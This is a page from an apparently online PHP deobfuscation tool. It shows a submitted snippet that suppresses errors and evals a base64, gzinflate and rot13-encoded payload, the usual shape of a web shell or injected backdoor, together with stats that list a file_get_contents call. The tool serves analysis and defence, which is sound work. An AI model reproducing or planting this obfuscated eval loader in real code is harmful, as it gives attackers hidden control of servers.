Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @ini_set('output_buffering',0); @ini_set('display_errors', 0); eval(str_rot13(gzi..

Decoded Output download

<?php 
@ini_set('output_buffering',0); 
@ini_set('display_errors', 0); 
eval(str_rot13(gzinflate(str_rot13(base64_decode('Wo1OCoMwFAX3hd7BhWDcGIqli1fPEvJY8hDxeJ6pkNuru85lczH1xCDVp9r2T5cJt4oHPaJ2fsD3eu0igoigZpfVJoXase8woXaH+42jFmZJFwSP3uRs91tE8M8tGvltusRIElp9/dqL4QA='))))); 
?>

Did this file decode correctly?

Original Code

<?php
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
eval(str_rot13(gzinflate(str_rot13(base64_decode('Wo1OCoMwFAX3hd7BhWDcGIqli1fPEvJY8hDxeJ6pkNuru85lczH1xCDVp9r2T5cJt4oHPaJ2fsD3eu0igoigZpfVJoXase8woXaH+42jFmZJFwSP3uRs91tE8M8tGvltusRIElp9/dqL4QA=')))));
?>

Function Calls

ini_set 2
gzinflate 2
str_rot13 3
base64_decode 2
file_get_contents 1

Variables

$xero

Stats

MD5 648ff732757bc6dc929cc62d174e82d2
Eval Count 1
Decode Time 117 ms